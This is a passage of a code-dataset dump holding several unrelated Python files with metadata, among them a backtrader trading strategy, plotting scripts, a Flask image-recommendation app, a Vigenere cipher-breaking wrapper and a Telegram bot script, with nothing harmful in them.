return\r\n\r\n # Check if an order has been completed\r\n # Attention: broker could reject order if not enough cash\r\n if order.status in [order.Completed]:\r\n if order.isbuy():\r\n self.log('BUY EXECUTED, %.2f' % order.executed.price)\r\n elif order.issell():\r\n self.log('SELL EXECUTED, %.2f' % order.executed.price)\r\n\r\n self.bar_executed = len(self)\r\n\r\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\r\n self.log('Order Canceled/Margin/Rejected')\r\n\r\n # Write down: no pending order\r\n self.order = None\r\n\r\n def notify_trade(self, trade):\r\n if not trade.isclosed:\r\n return\r\n\r\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f' %\r\n (trade.pnl, trade.pnlcomm))\r\n\r\n def next(self):\r\n # Simply log the closing price of the series from the reference\r\n self.log('Close, %.2f' % self.dataclose[0])\r\n # print(\"*\", self.datas[0].close[0])\r\n\r\n # Check if an order is pending ... if yes, we cannot send a 2nd one\r\n if self.order:\r\n return\r\n\r\n # Check if we are in the market\r\n if not self.position:\r\n\r\n # Not yet ... we MIGHT BUY if ...\r\n if self.dataclose[0] < self.dataclose[-1]:\r\n # current close less than previous close\r\n\r\n if self.dataclose[-1] < self.dataclose[-2]:\r\n # previous close less than the previous close\r\n\r\n # BUY, BUY, BUY!!! (with default parameters)\r\n self.log('BUY CREATE, %.2f' % self.dataclose[0])\r\n\r\n # Keep track of the created order to avoid a 2nd order\r\n self.order = self.buy()\r\n\r\n else:\r\n\r\n # Already in the market ... we might sell\r\n if len(self) >= (self.bar_executed + 50):\r\n # SELL, SELL, SELL!!! (with all possible default parameters)\r\n self.log('SELL CREATE, %.2f' % self.dataclose[0])\r\n\r\n # Keep track of the created order to avoid a 2nd order\r\n self.order = self.sell()\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\r\n datapath = os.path.join(modpath, 'GAZP_D1.csv')\r\n\r\n # print(datapath)\r\n # exit(1)\r\n\r\n data = pd.read_csv(datapath, sep=',', index_col='Date') # this data is from metatrader 5\r\n print(data)\r\n data = data.reset_index()\r\n data.rename(columns={'Date': 'datetime', 'Open': 'open', 'High': 'high',\r\n 'Low': 'low', 'Close': 'close', 'Volume': 'volume'},\r\n inplace=True) # Чтобы получить дату/время переименовываем колонки\r\n data.index = pd.to_datetime(data['datetime'])\r\n print(data)\r\n\r\n cerebro = bt.Cerebro()\r\n\r\n # Add a strategy\r\n cerebro.addstrategy(TestStrategy)\r\n\r\n cerebro.broker.setcash(100000.0)\r\n\r\n # Set the commission - 0.1% ... divide by 100 to remove the %\r\n cerebro.broker.setcommission(commission=0.001)\r\n\r\n # modpath = os.path.dirname(os.path.abspath(sys.argv[0]))\r\n # datapath = os.path.join(modpath, 'GAZP.ME (1).csv')\r\n # Create a Data Feed\r\n # data = bt.feeds.YahooFinanceCSVData(\r\n # dataname=datapath, # yahoo data downloaded from site\r\n # # Do not pass values before this date\r\n # fromdate=datetime.datetime(2022, 1, 1),\r\n # # Do not pass values after this date\r\n # todate=datetime.datetime(2022, 4, 1),\r\n # reverse=False)\r\n\r\n # Pass it to the backtrader datafeed and add it to the cerebro\r\n data = bt.feeds.PandasData(dataname=data)\r\n\r\n # Add the Data Feed to Cerebro\r\n cerebro.adddata(data)\r\n\r\n print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())\r\n\r\n cerebro.run()\r\n\r\n print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())", "repo_name": "WISEPLAT/Learn-BackTrader", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 43, "dataset": "github-code", "pt": "31", "api": [{"api_name": "backtrader.Strategy", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.path.dirname", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.path.abspath", "line_number": 95, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 95, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 96, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 107, "usage_type": "call"}, {"api_name": "backtrader.Cerebro", "line_number": 110, "usage_type": "call"}, {"api_name": "backtrader.feeds.PandasData", "line_number": 132, "usage_type": "call"}, {"api_name": "backtrader.feeds", "line_number": 132, "usage_type": "attribute"}]}
+{"seq_id": "16762797543", "text": "# -*- coding: utf-8 -*-\n\nimport datetime\nimport csv\nimport math\nimport matplotlib\nimport matplotlib.pyplot as pyplot\nimport matplotlib.dates as dates\n\nmatplotlib.rc('font', family='Arial')\nformatter = dates.DateFormatter('%d. %m. %Y')\n\ndata1 = {}\ndata2 = {}\nwith open('../data/processed/answer_time.csv', 'rb') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in reader:\n if int(row[0]) == 1:\n if not (int(row[1])/1000) in data1:\n data1[int(row[1])/1000] = 0\n data1[int(row[1])/1000] += 1\n else:\n if not (int(row[1])/1000) in data2:\n data2[int(row[1])/1000] = 0\n data2[int(row[1])/1000] += 1\n\nx = range(0,max(data1.keys())+1)\n\ny1 = [0 for _ in range (max(data1.keys())+1)]\nfor key, value in data1.items():\n y1[key] = value\n\ny2 = [0 for _ in range (max(data1.keys())+1)]\nfor key, value in data2.items():\n y2[key] = value\n\n\npyplot.ylabel(u'Počet odpovědí')\npyplot.xlabel(u'Čas (v sekundách)')\nax = pyplot.subplot()\npyplot.plot(x,y1, label=u'Otázky rozpoznání reprezentace')\nax = pyplot.subplot()\npyplot.plot(x,y2, label=u'Otázky rozpoznání obrázku')\npyplot.axis([0, 30 , 0, 400])\n\nhandles, labels = ax.get_legend_handles_labels()\ndisplay = (0,1)\nax.legend([handle for i,handle in enumerate(handles) if i in display], [label for i,label in enumerate(labels) if i in display], loc='upper right')\n\npyplot.show()", "repo_name": "repli2dev/nature-quizzer-analysis", "sub_path": "visualizations/answer_time_distribution.py", "file_name": "answer_time_distribution.py", "file_ext": "py", "file_size_in_byte": 1450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.rc", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.dates.DateFormatter", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.dates", "line_number": 11, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "70132913048", "text": "import math\nimport argparse\nimport os\nimport random\nfrom os import path\n\nrandom.seed(42)\n\nALPHABETS = \"ACGT\"\n\ndef main(output_location, number_of_cases):\n\n # If the location does not exists, create it\n if not path.isdir(output_location):\n os.mkdir(output_location)\n\n len_of_zero_padding = len(str(number_of_cases))\n\n # Create test files as much as the number of cases\n for i in range(number_of_cases):\n\n # Create a file with input cases\n with open(f\"{output_location}/input{i:0>{len_of_zero_padding}}.txt\", \"w\", encoding=\"utf-8\") as file:\n\n for _ in range(2):\n # Write first string\n file.write(f\"{''.join(random.sample(ALPHABETS, len(ALPHABETS)))}\\n\")\n\n # Write indices\n current = len(ALPHABETS)\n\n for _ in range(0, random.randint(3, 7)):\n index = random.randint(0, current)\n current += current\n\n # Write index to the file\n file.write(f\"{index}\\n\")\n # We're done\n\n print(f\"Generation of test files done at :: {output_location}\")\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ol\", \"--output-location\", type=str, default=\"./../input\", help=\"Location of the direrctory where to output the test files. Do not end with a slash.\")\n parser.add_argument(\"-n\", \"--number-of-cases\", type=int, default=16, help=\"Number of test files to generate.\")\n args = parser.parse_args()\n \n main(args.output_location, args.number_of_cases)", "repo_name": "daveaditya/CSCI_570_ALGO", "sub_path": "src/main/resources/python/test_generator.py", "file_name": "test_generator.py", "file_ext": "py", "file_size_in_byte": 1462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 15, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 46, "usage_type": "call"}]}
+{"seq_id": "29831783248", "text": "import argparse\n\n\ndef TestOptions():\n parser = argparse.ArgumentParser(description='PyTorch hand pose Training')\n \n #dataset\n #model structure\n parser.add_argument('--target-weight', dest='target_weight',\n action='store_true',\n help='Loss with target_weight')\n parser.add_argument('--is-train', type=bool, default=False,\n help='is train')\n parser.add_argument('--gpu-ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')\n parser.add_argument('--hpe-enabled', type=bool, default=False, help='is hpe')\n \n\n \n # data preprocessing\n \n \n #checkpoint\n \n return parser.parse_args()", "repo_name": "baeckgoo/ir-hand", "sub_path": "HPE2/src/options/test_options.py", "file_name": "test_options.py", "file_ext": "py", "file_size_in_byte": 717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "14718394771", "text": "from optibook.synchronous_client import Exchange\r\n# from basic_trader import start_trading\r\nfrom smarter_trader import start_trading\r\nfrom IPython.display import clear_output\r\nfrom social_feeds import get_social_feed\r\n# from testing_feeds import get_mood_for_news\r\n\r\nimport asyncio\r\nimport time\r\nimport logging\r\nlogger = logging.getLogger('client')\r\nlogger.setLevel('ERROR')\r\n\r\nprint(\"Setup was successful.\")\r\n\r\nexchange = Exchange()\r\nexchange.connect()\r\n\r\nINSTRUMENTS = exchange.get_instruments()\r\n\r\nQUOTED_VOLUME = 10\r\nFIXED_MINIMUM_CREDIT = 0.15\r\nPRICE_RETREAT_PER_LOT = 0.005\r\nPOSITION_LIMIT = 100\r\n\r\nhold = {\r\n 'CSCO': {'value': 0, 'mood': None},\r\n 'PFE': {'value': 0, 'mood': None},\r\n 'SAN': {'value': 0, 'mood': None},\r\n 'ING': {'value': 0, 'mood': None},\r\n 'NVDA': {'value': 0, 'mood': None},\r\n}\r\n\r\nasync def trader():\r\n global hold\r\n while True:\r\n start_trading(exchange, INSTRUMENTS, QUOTED_VOLUME, FIXED_MINIMUM_CREDIT, PRICE_RETREAT_PER_LOT, POSITION_LIMIT, hold)\r\n \r\n await asyncio.sleep(2)\r\n \r\n for k, v in hold.items():\r\n if v['value'] > 0:\r\n hold[k]['value'] = v['value'] - 1\r\n \r\n # Clear the displayed information after waiting\r\n clear_output(wait=True)\r\n \r\nasync def newsChecker():\r\n global hold\r\n while True:\r\n social_feeds = get_social_feed(exchange)\r\n \r\n if social_feeds:\r\n for feed, mood in social_feeds.items():\r\n if not feed:\r\n continue\r\n \r\n if mood < 0.45:\r\n hold[feed] = {'value': 12, 'mood': 'ask'}\r\n exchange.delete_orders(feed)\r\n print(f'Someting bad happened to {feed}')\r\n \r\n elif mood > 0.55:\r\n hold[feed] = {'value': 12, 'mood': 'bid'}\r\n exchange.delete_orders(feed)\r\n print(f'Someting good happened to {feed}')\r\n else:\r\n exchange.delete_orders(feed)\r\n continue\r\n else:\r\n print(f'\\n --- No news --- \\n')\r\n \r\n await asyncio.sleep(5)\r\n \r\n \r\nloop = asyncio.get_event_loop()\r\ntask1 = asyncio.ensure_future(trader())\r\ntask2 = asyncio.ensure_future(newsChecker())\r\n\r\nloop.run_until_complete(asyncio.gather(task1, task2))", "repo_name": "LeonsBuntis/hackzurich2023", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "optibook.synchronous_client.Exchange", "line_number": 16, "usage_type": "call"}, {"api_name": "smarter_trader.start_trading", "line_number": 37, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 46, "usage_type": "call"}, {"api_name": "social_feeds.get_social_feed", "line_number": 51, "usage_type": "call"}, {"api_name": "social_feeds.items", "line_number": 54, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 73, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 77, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 78, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 80, "usage_type": "call"}]}
+{"seq_id": "23031401312", "text": "from flask import Flask, render_template, request\nfrom PIL import Image\nimport numpy as np\nimport pickle\nimport tensorflow\nimport keras\nfrom keras.utils import load_img, img_to_array\nfrom keras.preprocessing import image\nfrom keras.layers import GlobalMaxPooling2D\nfrom keras.applications.resnet import ResNet50,preprocess_input\nfrom sklearn.neighbors import NearestNeighbors\nfrom numpy.linalg import norm\n\nfeature_list = np.array(pickle.load(open('embedded.pkl','rb')))\nfilenames = pickle.load(open('filenames.pkl','rb'))\n\nmodel = ResNet50(weights='imagenet',include_top=False,input_shape=(224,224,3))\nmodel.trainable = False\n\nmodel = tensorflow.keras.Sequential([\n model,\n GlobalMaxPooling2D()\n])\n\n\n\ndef feature_extraction(img_path,model):\n img = load_img(img_path, target_size=(224, 224))\n img_array = img_to_array(img)\n expanded_img_array = np.expand_dims(img_array, axis=0)\n preprocessed_img = preprocess_input(expanded_img_array)\n result = model.predict(preprocessed_img).flatten()\n normalized_result = result / norm(result)\n\n return normalized_result\n\ndef recommend(features,feature_list):\n neighbors = NearestNeighbors(n_neighbors=5, algorithm='brute', metric='euclidean')\n neighbors.fit(feature_list)\n\n distances, indices = neighbors.kneighbors([features])\n print(indices)\n return indices\n\n\napp = Flask(__name__)\n\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/', methods = ['post'])\ndef imageWork():\n imagefile = request.files['image_input']\n imagePath = \"./static/uploads/\" + imagefile.filename\n imagefile.save(imagePath) \n image_sample = feature_extraction(imagePath,model)\n indices = recommend(image_sample,feature_list)\n list_add = []\n for file in indices[0][0:8]:\n list_add.append(filenames[file])\n list_add\n display_image = list_add[0]\n return render_template('index.html', imagelist = list_add, display_image = display_image)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)", "repo_name": "anoopjoshi015/Product-Recommendation", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 15, "usage_type": "call"}, {"api_name": "keras.applications.resnet.ResNet50", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 20, "usage_type": "attribute"}, {"api_name": "keras.layers.GlobalMaxPooling2D", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.utils.load_img", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.utils.img_to_array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.applications.resnet.preprocess_input", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}]}
+{"seq_id": "16516135319", "text": "import json\nimport jsonschema\nimport octobot_commons.logging\n\n\nLOGGER_NAME = \"json_util\"\n\n\ndef validate(config, schema_file) -> None:\n \"\"\"\n Validate a config file, raise upon validation error\n :param config: the config\n :param schema_file: the config schema\n :return: None\n \"\"\"\n with open(schema_file) as json_schema:\n loaded_schema = json.load(json_schema)\n jsonschema.validate(instance=config, schema=loaded_schema)\n\n\ndef read_file(\n file_path: str,\n raise_errors: bool = True,\n on_error_value: dict = None,\n open_mode=\"r\",\n) -> dict:\n \"\"\"\n Read a load the given file with json.load()\n :param file_path: file to read\n :param raise_errors: when True will forward errors. Will just log errors otherwise\n :param on_error_value: return this value when raise_errors is False and an error occurs\n :param open_mode: the file open mode to give to open()\n :return: the parsed file or default value on error if possible\n \"\"\"\n try:\n with open(file_path, open_mode) as open_file:\n return json.load(open_file)\n except PermissionError as err:\n if raise_errors:\n raise\n octobot_commons.logging.get_logger(LOGGER_NAME).error(\n f\"Permission error when reading {file_path} file: {err}.\"\n )\n except Exception as err:\n if raise_errors:\n raise\n octobot_commons.logging.get_logger(LOGGER_NAME).exception(\n f\"Unexpected error when reading {file_path} file: {err}.\"\n )\n if on_error_value is None:\n raise ValueError(\"on_error_value is unset\")\n return on_error_value\n", "repo_name": "techfreaque/octane", "sub_path": "octobot-packages/OctoBot-Commons/octobot_commons/json_util.py", "file_name": "json_util.py", "file_ext": "py", "file_size_in_byte": 1636, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.load", "line_number": 17, "usage_type": "call"}, {"api_name": "jsonschema.validate", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "octobot_commons.logging.logging.get_logger", "line_number": 41, "usage_type": "call"}, {"api_name": "octobot_commons.logging.logging", "line_number": 41, "usage_type": "attribute"}, {"api_name": "octobot_commons.logging", "line_number": 41, "usage_type": "name"}, {"api_name": "octobot_commons.logging.logging.get_logger", "line_number": 47, "usage_type": "call"}, {"api_name": "octobot_commons.logging.logging", "line_number": 47, "usage_type": "attribute"}, {"api_name": "octobot_commons.logging", "line_number": 47, "usage_type": "name"}]}
+{"seq_id": "46119690232", "text": "#!/usr/bin/env python\n\nfrom setuptools import setup\n\nREQUIRES = [\n 'wiringpi'\n]\n\nsetup(name='Servo Control',\n version='1.0',\n description='Servo Script',\n author='Juan Pablo Samper',\n author_email='jpsamper2009@gmail.com',\n url='https://github.com/pereza77/decisionMakerServer',\n install_requires=REQUIRES\n )\n", "repo_name": "angelicaperez37/decisionMakerServer", "sub_path": "servo/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 344, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]}
+{"seq_id": "72479020250", "text": "import os\nimport json\nimport yaml\n\nimport SpendedTime\n\n\nlogs_directory = './'\nlog_file_name = 'statistics.json'\nconfig_file_name = 'used_config.yaml'\n\ndef get_config_file(file_name):\n with open(file_name, 'r') as stream:\n return yaml.load(stream)\n\ndef get_log_file(file_name):\n with open(file_name) as content:\n return json.load(content)\n\ndef is_result_directory(path):\n return (os.path.isdir(path) and log_file_name in os.listdir(path) and config_file_name in os.listdir(path))\n\ndef main():\n for file_or_foldername in os.listdir(logs_directory):\n file_or_folderpath = os.path.join(logs_directory, file_or_foldername)\n if is_result_directory(file_or_folderpath):\n log_file = get_log_file(os.path.join(file_or_folderpath, log_file_name))\n config_file = get_config_file(os.path.join(file_or_folderpath, config_file_name))\n\n for product_id in [i['id'] for i in config_file['productionLine']['products']]:\n SpendedTime.generate_chart(file_or_folderpath, config_file, log_file, product_id)\n\nif __name__ == '__main__':\n main()", "repo_name": "Claypuppet/OSM-factorysim", "sub_path": "scripts/python/Graphs.py", "file_name": "Graphs.py", "file_ext": "py", "file_size_in_byte": 1111, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "SpendedTime.generate_chart", "line_number": 31, "usage_type": "call"}]}
+{"seq_id": "33608427505", "text": "# Vigenere File Hack\n# Wrapper to use files for bruteforce hack\n\nimport argparse # https://docs.python.org/3/library/argparse.html\nimport textwrap # https://docs.python.org/3/library/textwrap.html\n\nimport vigenere_hack\n\n\ndef main():\n # Get and parse the arguments\n options = get_args()\n\n input_file = open(options.input_filename.name)\n ciphertext = input_file.read()\n input_file.close()\n\n try:\n hacked_message = vigenere_hack.hack_vigenere(ciphertext)\n if hacked_message is not None:\n print(\"Writing decrypted text to %s.\" % options.output_filename.name)\n\n output_file = open(options.output_filename.name, \"w\")\n output_file.write(hacked_message)\n output_file.close()\n else:\n print(\"Failed to hack encryption.\")\n except KeyboardInterrupt:\n print(\"\\n[+] Detected CTRL+C ... \")\n print(\"[+] Done\")\n\n\ndef get_args():\n parser = argparse.ArgumentParser(\n description=\"Vigenere File Hack\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=textwrap.dedent(\n \"\"\"Example:\n vigenere_file_hack.py -i input_filename.txt -o output_filename.txt\n \"\"\"\n ),\n )\n parser.add_argument(\n \"-i\",\n \"--input_filename\",\n action=\"store\",\n dest=\"input_filename\",\n type=argparse.FileType(\"r\"),\n help=\"Takes input from a file name of your choice\",\n )\n parser.add_argument(\n \"-o\",\n \"--output_filename\",\n action=\"store\",\n dest=\"output_filename\",\n type=argparse.FileType(\"w\"),\n help=\"Directs the output to a name of your choice\",\n )\n values = parser.parse_args()\n return values\n\n\n# main() function.\nif __name__ == \"__main__\":\n main()\n", "repo_name": "tymyrddin/scripts-classical-ciphers", "sub_path": "vigenere/vigenere_file_hack.py", "file_name": "vigenere_file_hack.py", "file_ext": "py", "file_size_in_byte": 1793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "vigenere_hack.hack_vigenere", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 34, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 36, "usage_type": "attribute"}, {"api_name": "textwrap.dedent", "line_number": 37, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 48, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "30797705864", "text": "#coding:utf-8\nimport requests\n\nwith open(\"link.txt\", \"r\") as f:\n count = 1\n for line in f.readlines():\n imgUrl = line.strip('\\n') #去掉列表中每一个元素的换行符\n #imgUrl = 'https://res.qxueyou.com/img/2020/09/02/'+line\n image_name = str(count) + '.PNG'\n print(image_name,imgUrl)\n count+=1\n\n imgresponse = requests.get(imgUrl, stream=True) #以流的方式打开\n image = imgresponse.content\n address=\"C:\\\\Users\\Administrator\\Desktop\\PMP\"+\"\\\\\"\n try:\n with open(address+image_name ,\"wb\") as jpg:\n jpg.write(image)\n except IOError:\n print(\"IO Error\\n\")\n finally:\n jpg.close\n\n\n", "repo_name": "yangle92/Exercise", "sub_path": "Spider/Download_PMP_ppt.py", "file_name": "Download_PMP_ppt.py", "file_ext": "py", "file_size_in_byte": 720, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "17660453250", "text": "'''\nCreated on Nov 1, 2009\n\n@author: jecortez\n'''\nimport web\n#from controllers import charts\nfrom controllers import workflow\n#from controllers import benchmark\n#from controllers import benchmarkQueries\n#from controllers import benchmarkMySQLQueries\n\n#web.config.debug = False\n\nurls = (\n '/(.*)', 'index'\n)\n\ncontrollers = {'workflow':workflow\n #'charts':charts,\n #'benchmark':benchmark,\n #'benchmarkQueries':benchmarkQueries, \n #'benchmarkMySQLQueries':benchmarkMySQLQueries\n }\n\napp = web.application(urls, globals())\n\n\noptions = {\"render_plain\": web.template.render('views/'),\n \"render\": web.template.render('views/', base='layout'),\n \"dbhost\": \"bass02\",\n \"dbname\": \"pegasusLigoCombined2\",\n \"dbeventtable\": \"netlogger\"\n }\n\nclass index:\n def GET(self, query):\n query = str(web.webapi.ctx.path)\n \n #strip trailing /'s\n if query[-1] == \"/\":\n query = query[:-1]\n \n splitQuery = query.split(\"/\", 2)\n controller = splitQuery[1]\n action=\"\"\n if len(splitQuery)>2:\n action = splitQuery[2]\n controllerClass=controllers[controller]\n return controllerClass.invokeAction(action, options)\n def POST(self, query):\n return self.GET(query)\n\n#if __name__ == \"__main__\": app.run()\napplication = web.application(urls, globals()).wsgifunc()\n", "repo_name": "elainenaomi/stampedewebapi", "sub_path": "WebApi-Mongo/trunk/dispatcher.py", "file_name": "dispatcher.py", "file_ext": "py", "file_size_in_byte": 1460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "controllers.workflow", "line_number": 19, "usage_type": "name"}, {"api_name": "web.application", "line_number": 26, "usage_type": "call"}, {"api_name": "web.template.render", "line_number": 29, "usage_type": "call"}, {"api_name": "web.template", "line_number": 29, "usage_type": "attribute"}, {"api_name": "web.template.render", "line_number": 30, "usage_type": "call"}, {"api_name": "web.template", "line_number": 30, "usage_type": "attribute"}, {"api_name": "web.webapi", "line_number": 38, "usage_type": "attribute"}, {"api_name": "web.application", "line_number": 55, "usage_type": "call"}]}
+{"seq_id": "70334083929", "text": "import configparser\nimport db_ops\nimport telebot\nfrom telebot import types\n\nconfig = configparser.ConfigParser()\nconfig.read('balde.conf')\n\nTOKEN = config['BALDE']['TOKEN']\nbot = telebot.TeleBot(TOKEN)\nchannelid = config['BALDE']['CHANNELID']\n\nbutton2 = types.InlineKeyboardMarkup()\nbutton_ask = types.InlineKeyboardButton('Eu quero!', callback_data=\"/quero\")\nbutton2.row(button_ask)\n\nposts = db_ops.selectbigger('Balde', 'days', 0)\nfor post in posts:\n days_left = post[4]-1\n if days_left == 0:\n desc = '{}\\nPrazo expirado.'.format(post[3])\n bot.edit_message_caption(desc, channelid, post[1], parse_mode='HTML')\n bot.unpin_chat_message(channelid, post[1])\n elif int(post[5]) > 0:\n desc = '{}\\n{} tem {} dias para buscar.'.format(post[3], post[5], post[6], days_left)\n bot.edit_message_caption(desc, channelid, post[1], parse_mode='HTML')\n else:\n desc = '{}\\nDias restantes no balde: {}'.format(post[3], days_left)\n bot.edit_message_caption(desc, channelid, post[1], parse_mode='HTML', reply_markup=button2)\n db_ops.update('Balde', 'days', days_left, 'post', post[1])\n", "repo_name": "GabrielRF/CalangoHC-Balde", "sub_path": "count_day.py", "file_name": "count_day.py", "file_ext": "py", "file_size_in_byte": 1161, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}, {"api_name": "telebot.TeleBot", "line_number": 10, "usage_type": "call"}, {"api_name": "telebot.types.InlineKeyboardMarkup", "line_number": 13, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 13, "usage_type": "name"}, {"api_name": 